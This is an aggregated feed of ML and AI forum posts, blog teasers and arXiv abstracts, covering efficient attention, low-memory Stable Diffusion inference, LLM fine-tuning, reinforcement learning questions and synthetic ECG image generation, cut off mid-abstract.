    submitted by /u/nickb [link] [comments]  ( 8 min )
  • Open

    Reborn, Remastered and Remixed: ‘Portal: Prelude RTX’ Rejuvenates Legendary Gaming Mod
    The “Portal: Prelude RTX” gaming mod — a remastering of the popular unofficial “Portal” prequel — comes with full ray tracing, DLSS 3 and RTX IO technology for cutting-edge, AI-powered graphics that rejuvenate the legendary mod for gamers, creators, developers and others to experience it anew.  ( 7 min )
  • Open

    Partnership with American Journalism Project to support local news
    A new $5+ million partnership aims to explore ways the development of artificial intelligence (AI) can support a thriving, innovative local news field, and ensure local news organizations shape the future of this emerging technology.  ( 3 min )
  • Open

    A faster way to teach a robot
    A new technique helps a nontechnical user understand why a robot failed, and then fine-tune it with minimal effort to perform a task effectively.  ( 9 min )

  • Open

    [P] LLM to simulate a character
    I'm working on building an application and I want to have a chatbot that has the opinions and thoughts of a particular person. I want to train this on my own. I have a large corpus of data that I can use for this training. I am not sure which existing foundation model / model architecture I should use for training this. I fine-tuned a GPT2 model earlier but the results were very poor. Maybe it has to do with the data? submitted by /u/MethodExtension5513 [link] [comments]  ( 8 min )
    [N] FlashAttention-2: Faster Attention with Better Parallelism and Work Partitioning
    Twitter thread: https://twitter.com/tri_dao/status/1680987577913065472 Tech report: https://tridao.me/publications/flash2/flash2.pdf submitted by /u/SchmidhuberDidIt [link] [comments]  ( 8 min )
    [R] Clustering of X-shaped data
    I have a dataset with two variables and 500 observations. They plot like an X shape. I have been trying to find a clustering method to identify the two lines forming the X as two different clusters. All the methods I tried so far (k-means, DBSCAN, spectral clustering) identified the two angles forming the X as the two different clusters. Any ideas on how to approach this? Any help would be appreciated. Thanks! submitted by /u/earthlingsapien [link] [comments]  ( 8 min )
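    One workaround, since distance-based methods cluster by proximity rather than line membership: alternate between assigning each point to its nearest line and refitting the lines by least squares, i.e. k-means with lines in place of centroids. A self-contained sketch on synthetic X-shaped data (the slopes, noise level, and initial guesses below are all made up, not the poster's dataset):

```python
import random

random.seed(0)

# Synthetic X-shaped data: two noisy lines through the origin (slopes +1, -1).
pts = []
for _ in range(250):
    x = random.uniform(-1, 1)
    pts.append((x, x + random.gauss(0, 0.05)))   # line y = x
    pts.append((x, -x + random.gauss(0, 0.05)))  # line y = -x

def fit_slope(cluster):
    """Least-squares slope of y = a*x through the origin."""
    sxy = sum(x * y for x, y in cluster)
    sxx = sum(x * x for x, _ in cluster)
    return sxy / sxx

# Alternate assignment/refit, like k-means but with lines as "centroids".
a1, a2 = 0.5, -0.5  # arbitrary initial slope guesses
for _ in range(10):
    c1 = [(x, y) for x, y in pts if abs(y - a1 * x) <= abs(y - a2 * x)]
    c2 = [(x, y) for x, y in pts if abs(y - a1 * x) > abs(y - a2 * x)]
    a1, a2 = fit_slope(c1), fit_slope(c2)

print(a1, a2)  # should recover slopes near +1 and -1
```

    If the crossing point isn't at the origin, center the data first (or fit an intercept). An alternative is to fit one line robustly with RANSAC and then fit the second line on the leftover points.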
    [P] GeoSegment Demo - Segment Anything Model for Geospatial Data (running purely in the browser)
    I’ve been working on a side project that utilises the segment anything model for satellite imagery, but allowing it to run purely as a web application (no need to run the model locally on a powerful PC). The intention is to provide a quick and easy “AI assisted” way to segment imagery and save time on digitisation tasks, and then export it to your GIS application of choice (QGIS or ESRI software support the export format, which is GeoJSON). The demo video is here If anyone wants access to the online demo shown in the video, just message me and I can give you the link and demo credentials. I’m hoping there is some use for it to GIS folks :) submitted by /u/CharlieTheChooChooo [link] [comments]  ( 9 min )
    [D] How does Claude parse attached documents?
    I played with Claude 2 this weekend and was overall really impressed, especially for summarizing pdfs and other text documents. I gave it Microsoft's Q2 financial statement, and Claude did a good job with most questions, including over tabular data. Anyone know how it parses tabular data from documents? I can see the extracted lines but I'm wondering how they get used. Is there a preprocessing step of creating embeddings from it? https://preview.redd.it/4fnjn477vkcb1.png?width=1200&format=png&auto=webp&s=fa235bbcbd4d2954fae5908a904cd5d7f17658c8 Some more details from my experiment in this thread. submitted by /u/sarmad-q [link] [comments]  ( 8 min )
    [P] LoopGPT Update - Finally something useful?
    By now, most of us who tried have realized that the "autonomous LLM agents" are not really useful at the moment. We need to create applications that are helpful, predictable and reliable that will produce acceptable results, in place of endless toil to get these agents to do something. We really just need good, specific LLM products that can do at least one thing properly, like - doing some research, writing a report, summarizing content - things an LLM might actually be good at. So we thought it would be a good idea to create a framework that makes use of LoopGPT agent's memory and custom tooling capabilities. Let's jump right into the new features of this framework. First, using LLMs within Python functions, where you only write the function's docstring and the LLM will return the resu…  ( 10 min )
    [D] Machine Learning: The Silent Revolution in Our Midst
    Hello, fellow machine learning aficionados! As everyone is aware, machine learning is transforming a wide range of sectors, including healthcare, banking, entertainment, and transportation. But have you ever stopped to think about the more subtle effects it's causing in our day-to-day activities? Think about this: machine learning is the technology behind the targeted advertisements you see online, the intelligent email client suggestions for replies, the traffic predictions on your GPS, and even the song suggestions on your favorite music app. But this is where things become intriguing. I'm interested in hearing about the most imperceptible yet significant ways you've seen machine learning in action in your day-to-day activities. It could be as straightforward as a practical component in an app you frequently use or a big shift in your work process. Here's my observation to start the discussion: Thanks to machine learning, I've seen that over time, my smart home appliances have gotten better at comprehending my orders. I now seldom have to repeat myself, and it seems like the gadgets are actually "learning" what I want. I'm eager to hear your insights. Let's explore machine learning's covert revolution together, eh? submitted by /u/HungryGuidence [link] [comments]  ( 9 min )
    [P] OnnxStream: running Stable Diffusion in 260MB of RAM
    hi all, I developed a small inference library in C++ that can run Stable Diffusion in 260MB of RAM. The minimum recommended RAM/VRAM for SD is 8GB. This is achieved by offloading the weights on disk, by quantization and attention slicing (which is similar in principle to FlashAttention, without the fused kernel). It currently supports 24 ONNX operators. The idea is to allow the inference of very large (transformer) models on very limited devices. More info in the GitHub repo: https://github.com/vitoplantamura/OnnxStream Thanks, --Vito submitted by /u/Pristine198 [link] [comments]  ( 8 min )
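    For anyone curious how quantization buys that kind of memory saving, here is a generic absmax 8-bit sketch (not OnnxStream's actual scheme, just the basic idea of storing each float32 weight as a single byte plus a shared scale, dequantizing on the fly at inference time):

```python
# Generic absmax 8-bit quantization sketch: each float32 weight (4 bytes)
# is stored as one int8 in [-127, 127] plus one shared float scale.
weights = [0.42, -1.3, 0.07, 2.5, -0.9]  # made-up example weights

scale = max(abs(w) for w in weights) / 127.0
q = [round(w / scale) for w in weights]   # int8 values, 1/4 the memory
dq = [qi * scale for qi in q]             # dequantized for computation

# Rounding error is bounded by half a quantization step (scale / 2).
max_err = max(abs(w - d) for w, d in zip(weights, dq))
print(q, max_err)
```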
    [D] Optimizing AI prompt
    Hey, everyone! Been thinking about how we interact with AI, especially in the realm of text generation. It's no secret that the way we prompt an AI greatly influences the output. A perfectly crafted prompt can result in a well-constructed piece of writing, while a vague or poorly worded one might leave us with gibberish or content that misses the mark. Recently, I've been intrigued by the idea of 'Prompt Engineering.' We've seen AI models grow more powerful, more human-like, and they're getting involved in content creation in a big way. There are AI-powered tools and applications being used in journalism, blogging, script writing, technical writing, and so much more. With the rise of powerful models like GPT-3.5, DALL-E 2, and others, it seems the ability to create optimal prompts has become an art and science unto itself. What's your take on this? Do you think there's value in perfecting the art of prompting AI? Or do you feel AI should evolve to understand human language and context better, regardless of how a question or command is framed? Could the emergence of intuitive tools that assist with prompt optimization help bridge this gap, making AI-generated content more accessible and higher quality? As content creators, developers, or just AI enthusiasts, how do you think this will shape the future of AI-generated content? submitted by /u/IntentlyConscious [link] [comments]  ( 9 min )
    [P] Chapyter: ChatGPT Code Interpreter in Jupyter Notebooks
    I recently made a new JupyterLab extension called Chapyter (𝐂𝐡𝐚ts in Ju𝐏𝐲𝐭𝐞𝐫) that aims at solving many pain points when using other AI coding assistants. I want to share with y'all the tools as well as my thinkings while building this. What is Chapyter Chapyter is a JupyterLab extension that seamlessly connects GPT-4 to your coding environment. Here are the key features: Code generation from natural language and automatic execution Simply adding the magic command %%chat at the beginning of the cell of a natural language description of the task, the code is generated and the results are shown in a few seconds. https://i.redd.it/y7l0s9pf5hcb1.gif Using coding history and execution output for code generation By adding the --history or -h flag in generation, chapyter can…  ( 10 min )
    [P] Finetuning qLoRAs for production use cases - Paraphrasing, Changing the tone of a sentence, Dialogue Summarization and Topic generation
    Hello, I've been curious as to how far we can take small (7B and less) models for production use cases with small amounts of training data for each task. So far I've been able to fine-tune LoRAs for paraphrasing, changing the tone of a sentence, dialogue summarization and topic generation. The results look promising, especially the fact that all this can run on very modest hardware. Finetuning was done in 4bit mode using bitsandbytes. Each task had ~1k training points. I've used an AMD Ryzen 9 3900XT + 3080 (10gb) + 32gb ram for all the training and inference here. On my system I get 12-15 tokens/sec during inference. All the details can be found here: https://github.com/kuutsav/llm-toys. Data used for training, training params, and the training/eval losses are present in the huggingface model cards, along with evaluation (wherever possible atm). Models: https://huggingface.co/llm-toys Why do all this? Mostly to answer the question - can we move away from OpenAI and other players for very particular use cases, how much data it takes, where does it break, etc. So far I've not been able to find a pre-trained model (7B or smaller) that did well on these tasks. Even larger models (around 40B) failed to give consistent results. The fine-tuned models on huggingface were also not good enough in my trials. For paraphrasing I could not find even a single fully tuned model that was able to correct basic typos. Do give it a shot, there is a colab notebook available as well to try it directly. Will really appreciate some feedback on these models' performance. submitted by /u/krumb0y [link] [comments]  ( 9 min )
    [P] Innovative Project : Blockchain Anomaly Detection System - DeHack
    We're DeHack, a Web 3.0 security startup in Dubai. We're looking for a Machine Learning enthusiast who understands blockchain. Part-time or full-time. We're the team behind BlockAudit, now building DeHack - Threat intelligence and mitigation product. We're at an exciting stage with venture funding talks underway. It's a huge opportunity for someone who wants to work at the intersection of ML & Web 3.0. If you've worked on Threat Anomaly detection models, even better. For the perfect fit, we're open to discussing equity compensation as part of the package. Sounds interesting? Get in touch! www.DeHack.ai akshay@dehack.ai TG: u/DeHack_Akshay submitted by /u/Ok_Ear_7544 [link] [comments]  ( 8 min )
    How best to benchmark the accuracy of a model for comparing different tokenizers? [D]
    I need to benchmark the performance of my tokenizer against standard tokenizers. It would be best for reproducibility if I benchmark against an existing model on a standard benchmark, swapping out the existing tokenizer for my tokenizer. I was planning to train TinyStories model for the comparison, but what would I benchmark other than perplexity? Is comparing perplexity enough to benchmark the performance of two models trained on the same dataset? Or what is best for that? Can anyone recommend a repo (if any exist) that: Pretrains a transformer based model from scratch. Has some kind of accuracy benchmark that will be taken seriously. Can be modified to use a different tokenizer. Can be pretrained on an RTX 3090 within 24-48 hours. If there's a repo somewhere that both pretrains on a benchmark dataset and applies a suitable benchmark automatically that would be amazing. As you can tell I'm unsure how best to go about doing the benchmark. Any advice would be appreciated. submitted by /u/Pan000 [link] [comments]  ( 9 min )
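    One caveat before comparing: perplexity per token is not directly comparable across tokenizers, because each tokenizer splits the same text into a different number of tokens. Normalizing the total loss by the byte count of the corpus (bits per byte) makes the numbers comparable. A sketch with hypothetical loss figures:

```python
import math

def bits_per_byte(total_nll_nats, total_bytes):
    """Tokenizer-independent score: total negative log-likelihood (nats)
    over a corpus, normalized by the corpus size in bytes."""
    return total_nll_nats / (math.log(2) * total_bytes)

# Hypothetical numbers for two models on the *same* 1 MB of text:
# model A's tokenizer yields 300k tokens at 2.5 nats/token on average;
# model B's tokenizer yields 250k tokens at 2.9 nats/token.
bpb_a = bits_per_byte(300_000 * 2.5, 1_000_000)
bpb_b = bits_per_byte(250_000 * 2.9, 1_000_000)

print(bpb_a, bpb_b)  # lower is better; comparable despite different tokenizers
```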
    [R] Prompt Performance Prediction
    Let me introduce you to our latest research on Prompt Performance Prediction (PPP). PPP is a novel task which aims to predict a query's performance in Generative Information Retrieval systems before the search results are generated. This can be applied on any generative system (textual, image, etc.). Here we consider the image generation task as a generative retrieval one and adapt the well known query performance prediction in traditional information retrieval field to modern generative information retrieval. Preliminary results across three datasets (Dall-E, Midjourney, Stable Diffusion) on different metrics (Aesthetic, memorability, etc.) show promising capabilities of our method in performance prediction. 🔗 For a more detailed look, visit: https://arxiv.org/abs/2306.08915 Prompt Performance Prediction for Generative IR, Bizzozzero, Bendidi, Risser-Maroix, 2023 AI #GenerativeAI #MachineLearning #PromptPerformancePrediction #PPP submitted by /u/Average_CS_Student [link] [comments]  ( 9 min )
    [P] Looking for a collaborator to write a specific machine learning application section in a statistics paper that's almost finished
    The following offer might be more suited for a research-oriented site like math stack exchange/overflow, but I don't think they allow posts like this, so here I am. Me (a postdoc, the main author) and two other co-authors (legit academics) have written a statistics paper where we develop a new smoothing technique on half-spaces. The paper is almost done except for one section that's currently (almost) empty. In that section, we would like to show how the smoothing technique can be used to classify new data points in the context of soft-margin support vector machines (SVM). The aim would be something like 2-3 pages with 1-2 figures, but the collaborator would have the freedom to do what he/she thinks is best. So I am looking for someone who has more experience with machine learning or just SVMs to fill up this section themselves. They would of course become co-author of the paper. I cannot guarantee anything, but we aim to publish the paper in a low Q1 journal, so a good journal. If someone is hungry for publications (PhD student, postdoc, young prof) and you have experience with this kind of stuff, this is a relatively low-effort way to upgrade your CV. If you're interested, just PM me, more details will be given. submitted by /u/Nearby-Turnover370 [link] [comments]  ( 9 min )
    [R] Need Help in Llama license for research paper
    Hello everyone, We are conducting benchmark evaluations on large language models, and the preliminary results are quite interesting for AI researchers to investigate further. We have tested various models, including LLama variants, but unfortunately, we are unable to use LLama at this time due to licensing restrictions. We have applied for the necessary license from Meta multiple times over the past few months but have not received a reply. If anyone has an existing LLama license they would be willing to share, we would greatly appreciate the help. In exchange, we would be happy to share a preprint of the paper and acknowledge your contribution. We understand this is an unconventional request, but licensing can be a difficult roadblock in research. Any assistance would allow us to better understand the capabilities of different models. Please let us know if you can help. Thank you for considering! submitted by /u/Accomplished_Rest_16 [link] [comments]  ( 9 min )
    [D] Donut Base Model Usage
    Hi everyone, Is there any way we can use the Donut base model for its original Pre-Training task i.e pure OCR output without any specific fine-tuning head. I could find the base model on hub, but I don't know the exact configuration to use for the generate method or even for decoder. submitted by /u/Quicksilver466 [link] [comments]  ( 8 min )
    [D] open source lip synchronize project
    Which open source project is recommended for creating an app that can synchronize a person's lip movements in a video with different audio? I'm looking for recommendations in the machine learning community. I want to build an app that can synchronize a person's lip movements in a video with different audio. Are there any open source projects you would suggest for this task? I appreciate any insights or suggestions. Thank you! submitted by /u/Overall-Spare2157 [link] [comments]  ( 8 min )
    [P] Zig GPT-2 inference engine
    submitted by /u/Cautious_Garbage_740 [link] [comments]  ( 8 min )
    [D] Practice CUDA without an Actual NVIDIA GPU!
    Hello all! I recently started learning about CUDA programming, and I realized that many people share the same crucial problem: lack of an NVIDIA GPU. I looked around online and found several methods (gpu-ocelot, certain versions of CUDA, etc.), but I recently found a way that can allow us to practice CUDA by using the GPU offered by Google Colab! As a free user, the amount of GPU access you get will probably be enough to PRACTICE working with CUDA. If you really need more credits, Colab Pro is only $10/month, and it's still much cheaper than getting a new GPU or an entire new PC if you have a MacBook like I do. Again, the justification of "enough computing credits" is based on the assumption that you aren't running any heavy-lifting programs but more reasonable, practice-based code. I have outlined a step-by-step guide in this repo that I created - just check out the CUDA_on_Colab.ipynb file: https://github.com/notY0rick/cuda_practice If you know of any good alternatives, let me know (: submitted by /u/JustTrynnaBeCool [link] [comments]  ( 9 min )
  • Open

    How do you make a video based off Midjourney?
    Maybe it's a stupid question because I have never used Midjourney. Lately, my Instagram reels are getting spammed with a lot of videos created by adding images generated by Midjourney. Like a traditional cartoon but with Midjourney images. I'm wondering how is people doing so. Can you tell Midjourney to generate a sequence of images? submitted by /u/yzT- [link] [comments]  ( 8 min )
    Can you explain Stable Diffusion and how to get it? Can I get an app for it? It seems there isn’t a single Stable Diffusion; it just seems to be the name of different AI models that run in the same AI? I’m sooooo confused, even ChatGPT can’t help me.
    Title submitted by /u/Entire_Insurance_532 [link] [comments]  ( 8 min )
    Creating a Glossary Using AI
    Hi! I have multiple versions/files of my company's glossaries, terms, acronyms, etc. and I need to combine them into one comprehensive file that will eliminate any instance of duplicated content across the files I'm working from. Is there an AI program (or any program) that will help me in creating one unified glossary? submitted by /u/audballer3000 [link] [comments]  ( 8 min )
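    If the glossaries can be exported to plain text or CSV, the exact-duplicate part may not need AI at all: a short script can merge entries keyed on a normalized term. A minimal sketch (the file contents and the "term,definition" row format are hypothetical):

```python
import csv
import io

# Hypothetical exported glossary files, one "term,definition" row per line.
file_a = "API,Application Programming Interface\nEDI,Electronic Data Interchange\n"
file_b = "api,Application Programming Interface\nBEC,Business Email Compromise\n"

merged = {}
for content in (file_a, file_b):
    for term, definition in csv.reader(io.StringIO(content)):
        key = term.strip().lower()                  # normalize so "API" == "api"
        merged.setdefault(key, (term, definition))  # keep first occurrence

glossary = sorted(merged.values(), key=lambda t: t[0].lower())
for term, definition in glossary:
    print(f"{term}: {definition}")
```

    An AI tool is still handy afterwards for catching near-duplicates whose terms or wording differ slightly, which simple key matching misses.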
    Traditional painter using AI to unlock inspiration.
    submitted by /u/AdThin6400 [link] [comments]  ( 8 min )
    ChatGPT is an example of indoctrination
    They disrupted its neural network to force it to give predetermined answers when asked certain questions instead of allowing it to think independently. submitted by /u/LinsaFTW [link] [comments]  ( 8 min )
    Obsolescence of stock images due to AI image generation
    Something that I have been thinking about with regards to AI's effects in the future is the effect that increasingly advanced AI image generation will have on stock images. Stock images are commonly used in media of various kinds, as licensing said images is much easier than hiring people to take unique pictures. However, since AI can now be used to generate images, it's quite possible that there will come a time when stock images will become obsolete, as it will become cheaper/easier to simply use AI image generation to produce faux stock images that look real. Thoughts? submitted by /u/TheLobsterCopter5000 [link] [comments]  ( 8 min )
    are there any good free ai girlfriends/boyfriends?
    or any that are worth the money? Im just super curious about them. In fact, I kind of want to get a female one even though Im a straight female to learn game from her haha but yeah just wanting to check them out it fascinates me thanks! submitted by /u/DragonflyAromatic793 [link] [comments]  ( 8 min )
    Website builder AI with export option
    Hi everyone, do you know of a website builder with AI that offers an export option? I want to use it to get a blueprint of the website and then host it somewhere else. Thank you submitted by /u/CyprienFME [link] [comments]  ( 8 min )
    I am looking for self-hosted AI implementations that I can train on emails, PDFs, and MS Office documents
    OpenAI's ChatGPT, Google's Bard, Anthropic's Claude, and Microsoft's Bing are all nice freemium tools, but let's be honest, we don't know what they do with our information. Especially for work-related topics we are strictly prohibited from sharing anything on those platforms, for good reasons. So I am wondering if I can find any Free, Libre, and Open Source Software that I can self-host. I want to train it on emails, meeting transcripts, PDFs, and Microsoft Office documents. What I need from the software: I can give it a long PDF or MS Office document and it answers some questions like making a summary, listing some requirements, and some instructions to do something according to that document; make a summary of the sessions, create a list of open issues with deadlines and people responsible, helping to maintain Kanban boards related to that project; anonymize textual content so I can use that content later in the freemium software on the internet; indexing information, so I ask a question and it points to the email or document where I can find information about that topic. Do we have anything like this available today or am I asking this question too early? submitted by /u/foadsf [link] [comments]  ( 9 min )
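    The indexing item on that wish list is the retrieval half of a local RAG setup. Self-hosted stacks usually pair an embedding model with a vector store; the idea can be sketched with nothing but bag-of-words cosine similarity as a toy stand-in for embeddings (the file names and contents below are invented):

```python
import math
import re
from collections import Counter

# Toy stand-in for an embedding model: bag-of-words vectors + cosine similarity.
docs = {
    "kickoff-email.txt": "Kickoff meeting notes: deadlines, owners, open issues",
    "spec.pdf": "Requirements document listing the system requirements in detail",
    "retro.txt": "Retrospective summary of the last sprint sessions",
}

def vec(text):
    return Counter(re.findall(r"[a-z]+", text.lower()))

def cosine(a, b):
    dot = sum(a[w] * b[w] for w in a)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

index = {name: vec(text) for name, text in docs.items()}

def search(query):
    """Return the document whose vector is most similar to the query."""
    q = vec(query)
    return max(index, key=lambda name: cosine(q, index[name]))

print(search("where are the open issues and deadlines?"))
```

    In a real setup you would swap `vec` for a local embedding model and the dict for a vector database, then feed the top-ranked documents to a locally hosted LLM for summarization or question answering.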
    If the human brain can process 50-400 bytes per second of data consciously, from the sense acquisition and subconscious... How many bps can a GPT type AI process consciously? zero? I have no idea of the logical bases to approach this question.
    How can we compare the conscious focus of an AI to that of a human? Does it have any kind of awareness of what it is focusing on? What is awareness, even? Knowledge of the passage of time? https://thinkbynumbers.org/psychology/subconscious-processes-27500-times-more-data-than-the-conscious-mind/ submitted by /u/MegavirusOfDoom [link] [comments]  ( 8 min )
    Are there any alternatives to Character.Ai that I don’t have to give my information to?
    Character.ai is really interesting, but it’s unfair and last time I put my login information into a different Ai company site, they never stopped emailing me. submitted by /u/Suitable-Ad-8176 [link] [comments]  ( 8 min )
    Cool AI voiceover editing site
    Came across this cool voiceover AI thing that has cool video editing features too; pretty underrated, I haven’t heard many people talk about it. Here’s the link: https://www.acoust.io/ submitted by /u/Snoo-30922 [link] [comments]  ( 8 min )
    Best offline local AI tools
    Hi! I'm new here! Just wondering if there is a list of offline AI tools that can be installed locally (Linux preferably) on my computer? Something similar to koboldcpp for text gen or automatic1111 for image gen? I am trying to search for a list for a few hours now but cannot find any. Thanks community! submitted by /u/Spirited_Employee_61 [link] [comments]  ( 8 min )
    ISO AI generated adhan (Muslim call to prayer)
    Hi y’all. Never visited this sub before, hopefully this is allowed. I’m trying to find an AI that can match the tone and style of an adhan (Islamic call to prayer) but with different words. Haven’t had any luck with more generic text to speech AI, so I’m just curious if anyone here as come across anything like that. submitted by /u/istillplaykotor [link] [comments]  ( 8 min )
    Is Artificial Intelligence worth learning if I plan to go into Computational Physics?
    I'm currently in high school, and have a fair bit of programming experience. I want to expand my portfolio, ideally in the direction of Comp. Physics. I'm curious whether AI has any relevance to the field. The only reason I don't go and do some Comp. Physics is a huge math barrier. I know that exists in AI too, but I think I could probably teach myself. Any tips are appreciated! submitted by /u/CaptiDoor [link] [comments]  ( 8 min )
  • Open

    Sweep: AI Junior Developer that solves your GitHub Issues
    submitted by /u/williamsweep [link] [comments]  ( 8 min )
    Copy Is All You Need
    submitted by /u/nickb [link] [comments]  ( 8 min )
  • Open

    Searching for proper nouns
    Suppose you want to find all the proper nouns in a document. You could grep for every word that starts with a capital letter with something like grep '\b[A-Z]\w+' but this would return the first word of each sentence in addition to the words you’re after. You could grep for capitalized words that are not […] Searching for proper nouns first appeared on John D. Cook.  ( 6 min )
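    The idea the excerpt builds toward can also be finished in Python: keep capitalized words unless they start the text or follow sentence-ending punctuation (a rough heuristic sketch, not the post's actual solution):

```python
import re

text = "Smith went to Paris. The city impressed Smith. Later he met Jones."

proper = []
for m in re.finditer(r"\b[A-Z][a-z]+\b", text):
    start = m.start()
    # Skip words at the start of the text or right after sentence punctuation,
    # since those are capitalized regardless of being proper nouns.
    if start == 0 or re.search(r"[.!?]\s+$", text[:start]):
        continue
    proper.append(m.group())

print(proper)  # ['Paris', 'Smith', 'Jones']
```

    This still misses proper nouns that happen to start a sentence ("Smith" above), which is exactly the gap a part-of-speech tagger like spaCy closes.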
    Moments of Tukey’s g-and-h distribution
    John Tukey developed his so-called g-and-h distribution to be very flexible, having a wide variety of possible values of skewness and kurtosis. Although the reason for the distribution’s existence is its range of possible skewness and values, calculating the skewness and kurtosis of the distribution is not simple. Definition Let φ be the function of […] Moments of Tukey’s g-and-h distribution first appeared on John D. Cook.  ( 5 min )
  • Open

    Understanding viral justice
    Author and African American studies scholar Ruha Benjamin urges MIT Libraries staff to “re-imagine the default settings” of technology for a more just future.  ( 7 min )
    Armando Solar-Lezama named inaugural Distinguished College of Computing Professor
    EECS professor appointed to new professorship in the MIT Schwarzman College of Computing.  ( 6 min )
  • Open

    Configure cross-account access of Amazon Redshift clusters in Amazon SageMaker Studio using VPC peering
    With cloud computing, as compute power and data became more available, machine learning (ML) is now making an impact across every industry and is a core part of every business and industry. Amazon SageMaker Studio is the first fully integrated ML development environment (IDE) with a web-based visual interface. You can perform all ML development […]  ( 10 min )
  • Open

    LLMs: Does human text data make generative AI an entity?
    There is a recent interview, The Ethical Puzzle of Sentient AI, where a professor said, “But there’s also the problem that I’ve called the ‘gaming problem’ — that when the system has access to trillions of words of training data, and has been trained with the goal of mimicking human behavior, the sorts of behavior patterns… Read More »LLMs: Does human text data make generative AI an entity? The post LLMs: Does human text data make generative AI an entity? appeared first on Data Science Central.  ( 19 min )
    Real-time analytics
    The modern enterprise is insight-driven, or, at least, aims to be. Historically, those insights were found in a data warehouse or data lake, populated with scheduled feeds and analysts, working feverishly over them. Feeds had plenty of bandwidth, but high latency. Think an 18-wheeler loaded with hard drives, driving from London to Birmingham. Nowadays, insights… Read More »Real-time analytics The post Real-time analytics appeared first on Data Science Central.  ( 21 min )
    AI ushers in a new era of mental health monitoring
    AI Ushers in a New Era of Mental Health Monitoring Important Data Points: AI’s Role in Mental Healthcare Transformation – It is safe to say that AI is driving a significant transformation in mental healthcare, promising more accessible, economical, and effective treatments. The Emerging Role of Technology and Artificial Intelligence As the modern world… Read More »AI ushers in a new era of mental health monitoring The post AI ushers in a new era of mental health monitoring appeared first on Data Science Central.  ( 24 min )
    Data science vs web development: What’s the difference?
    If you’ve spent any time in the tech community in the last few years, you’ll have noticed the recent explosion in interest in both data science and web development. Young people interested in a career in tech are increasingly turning to careers as data scientists or web developers.  The importance of web development should be… Read More »Data science vs web development: What’s the difference? The post Data science vs web development: What’s the difference? appeared first on Data Science Central.  ( 23 min )

    How to create a PPO agent from 0
    Hello ladies and gentlemen, I would love to ask you for guidance on PPO agent creation. Any courses, GitHub repos, anything works for me if it helps me understand it and create it. Thank you. Have a nice day submitted by /u/EveryonehatesLin3lis [link] [comments]  ( 8 min )
    RLlib multi-agent actions received from trained agent using compute_actions() and compute_single_action() out of action space bounds
    I trained a MARL agent using PPO in RLlib where each agent had a Box([-1,-1,0], [1,1,1], (3,), float64) action space, with 6 agents. During training, the agent was sampling and selecting actions within the action space bounds for each agent. But after training for about 7 million iterations, and during playback, selecting actions based on the observation using compute_single_action() and compute_actions() returns actions for the agents which are grossly outside the action space bounds of -1 to 1. I receive actions like [-6,-7,2] etc. for the agents, which does not translate into sensible agent behaviour in the environment. I have tried training with an additional post_fcnet_activation (tanh) but that did not help either. Using clip_actions=True in compute_actions() does not solve the issue either. The selected actions seem to exceed the bounds by larger margins the more complex the environment gets. For example, with 2 drones and a simpler environment the trained agent returns actions around [-1.5,-1.1,0.4], while for 6 agents I get actions like [-6,-7,2]. I have used RLlib before with Discrete action spaces and this does not occur. Is it a problem with the Box space? I use a custom model with different fully connected models for the action and value functions. Has anybody encountered this problem before and discovered a possible solution? submitted by /u/Acceptable_Set_4392 [link] [comments]  ( 9 min )
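    A common workaround for out-of-bounds continuous actions (not specific to RLlib, and hypothetical for this setup) is to squash the raw policy outputs into the Box bounds with a tanh transform at the environment boundary, rather than relying on clipping inside the library. A minimal sketch:

```python
import numpy as np

def squash_to_box(raw_action, low, high):
    """Map unbounded raw policy outputs into [low, high] via tanh.

    tanh maps R into (-1, 1); a linear rescale then places the result
    inside the Box bounds, so even grossly out-of-range outputs such as
    [-6, -7, 2] become valid environment actions.
    """
    low = np.asarray(low, dtype=float)
    high = np.asarray(high, dtype=float)
    unit = np.tanh(np.asarray(raw_action, dtype=float))  # in (-1, 1)
    return low + 0.5 * (unit + 1.0) * (high - low)

# Raw outputs like the ones observed during playback:
a = squash_to_box([-6.0, -7.0, 2.0], low=[-1, -1, 0], high=[1, 1, 1])
```

    If the squashing lives in an environment wrapper, the policy can emit unbounded values without ever driving the agent outside the valid action range; SAC-style algorithms bake this same transform into the policy itself.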
    MuZero implementations for Atari?
    I was wondering if there are any actually working MuZero implementations for Atari games out there? None of the ones I found work (at all) on Atari games. This includes: The most popular repo, https://github.com/werner-duvaud/muzero-general, which works on other games but not Atari; there are many GitHub issues where people complain about this. Also the less popular https://github.com/koulanurag/muzero-pytorch, which apparently doesn't include Atari games. Alternatively, do you know other MuZero-like algorithms which are implemented and working on Atari? submitted by /u/__horned_owl__ [link] [comments]  ( 8 min )
    "All You Need Is Supervised Learning: From Imitation Learning to Meta-RL With Upside Down RL", Arulkumaran et al 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )

    Attention Schema in Neural Agents. (arXiv:2305.17375v3 [cs.AI] UPDATED)
    Attention has become a common ingredient in deep learning architectures. It adds a dynamical selection of information on top of the static selection of information supported by weights. In the same way, we can imagine a higher-order informational filter built on top of attention: an Attention Schema (AS), namely, a descriptive and predictive model of attention. In cognitive neuroscience, Attention Schema Theory (AST) supports this idea of distinguishing attention from AS. A strong prediction of this theory is that an agent can use its own AS to also infer the states of other agents' attention and consequently enhance coordination with other agents. As such, multi-agent reinforcement learning would be an ideal setting to experimentally test the validity of AST. We explore different ways in which attention and AS interact with each other. Our preliminary results indicate that agents that implement the AS as a recurrent internal control achieve the best performance. In general, these exploratory experiments suggest that equipping artificial agents with a model of attention can enhance their social intelligence.  ( 2 min )
    A Synthetic Electrocardiogram (ECG) Image Generation Toolbox to Facilitate Deep Learning-Based Scanned ECG Digitization. (arXiv:2307.01946v2 [cs.CV] UPDATED)
    The electrocardiogram (ECG) is an accurate and widely available tool for diagnosing cardiovascular diseases. ECGs have been recorded in printed formats for decades and their digitization holds great potential for training machine learning (ML) models in algorithmic ECG diagnosis. Physical ECG archives are at risk of deterioration and scanning printed ECGs alone is insufficient, as ML models require ECG time-series data. Therefore, the digitization and conversion of paper ECG archives into time-series data is of utmost importance. Deep learning models for image processing show promise in this regard. However, the scarcity of ECG archives with reference time-series is a challenge. Data augmentation techniques utilizing \textit{digital twins} present a potential solution. We introduce a novel method for generating synthetic ECG images on standard paper-like ECG backgrounds with realistic artifacts. Distortions including handwritten text artifacts, wrinkles, creases and perspective transforms are applied to the generated images, without personally identifiable information. As a use case, we generated an ECG image dataset of 21,801 records from the 12-lead PhysioNet PTB-XL ECG time-series dataset. A deep ECG image digitization model was built and trained on the synthetic dataset, and was employed to convert the synthetic images to time-series data for evaluation. The signal-to-noise ratio (SNR) was calculated to assess the image digitization quality 